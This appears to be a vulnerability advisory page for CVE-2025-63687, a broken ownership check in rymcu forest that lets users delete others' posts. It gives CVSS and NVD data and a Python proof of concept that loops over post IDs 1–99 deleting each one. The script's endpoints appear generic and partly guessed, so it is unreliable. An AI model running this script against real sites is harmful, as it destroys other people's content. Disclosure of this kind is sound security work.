Security Vulnerability Report
CVE-2025-63687 CVSS 6.5 MEDIUM


Published: 2025-11-07 16:15:42
Last Modified: 2026-01-21 21:05:35

Description

An issue was discovered in rymcu forest through commit f782e85 (2025-09-04) in function doBefore in file src/main/java/com/rymcu/forest/core/service/security/AuthorshipAspect.java, allowing authorized attackers to delete arbitrary users' posts.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:rymcu:forest:*:*:*:*:*:*:*:* - VULNERABLE
rymcu forest commit < f782e85 (2025-09-04)
For the exact affected versions, refer to the commit history of the official GitHub repository.

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-63687 PoC - rymcu forest authorization bypass: deleting arbitrary users' posts
import requests
import json

# Target environment configuration
TARGET_URL = "http://target-website.com"
LOGIN_URL = f"{TARGET_URL}/api/login"
DELETE_POST_URL = f"{TARGET_URL}/api/post/delete"


# Step 1: log in and obtain an authentication token
def login(username, password):
    session = requests.Session()
    response = session.post(LOGIN_URL, json={
        "username": username,
        "password": password
    })
    if response.status_code == 200:
        return session, response.json().get('token')
    return None, None


# Step 2: PoC for deleting another user's post
def delete_arbitrary_post(session, victim_post_id):
    """
    Because the doBefore function of AuthorshipAspect does not correctly
    verify post ownership, an attacker can delete the post for any post_id.
    """
    headers = {
        "Content-Type": "application/json",
        # add any required authentication headers here
    }
    payload = {
        "postId": victim_post_id  # ID of the target victim's post
    }
    response = session.post(DELETE_POST_URL, json=payload, headers=headers)
    if response.status_code == 200 and response.json().get('success'):
        print(f"[+] Successfully deleted post ID: {victim_post_id}")
        return True
    else:
        print(f"[-] Deletion failed: {response.text}")
        return False


# Main program
if __name__ == "__main__":
    # log in with the attacker's account
    attacker_session, token = login("attacker_username", "attacker_password")
    if attacker_session:
        # iterate over a range of post IDs and attempt to delete each one
        for post_id in range(1, 100):
            delete_arbitrary_post(attacker_session, post_id)
```

References

https://gist.github.com/LockeTom/564d5be6b75bb64d120daed96d74ec9c (Exploit, Third Party Advisory)
https://github.com/rymcu/forest/issues/193 (Exploit, Issue Tracking, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-63687",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-07T16:15:42.383",
    "lastModified": "2026-01-21T21:05:34.847",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "An issue was discovered in rymcu forest thru commit f782e85 (2025-09-04) in function doBefore in file src/main/java/com/rymcu/forest/core/service/security/AuthorshipAspect.java, allowing authorized attackers to delete arbitrary users posts."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:rymcu:forest:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "2025-09-04",
                "matchCriteriaId": "53C995E6-F16B-4E65-BEA8-2155D74E3320"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://gist.github.com/LockeTom/564d5be6b75bb64d120daed96d74ec9c",
        "source": "[email protected]",
        "tags": ["Exploit", "Third Party Advisory"]
      },
      {
        "url": "https://github.com/rymcu/forest/issues/193",
        "source": "[email protected]",
        "tags": ["Exploit", "Issue Tracking", "Vendor Advisory"]
      }
    ]
  }
}
```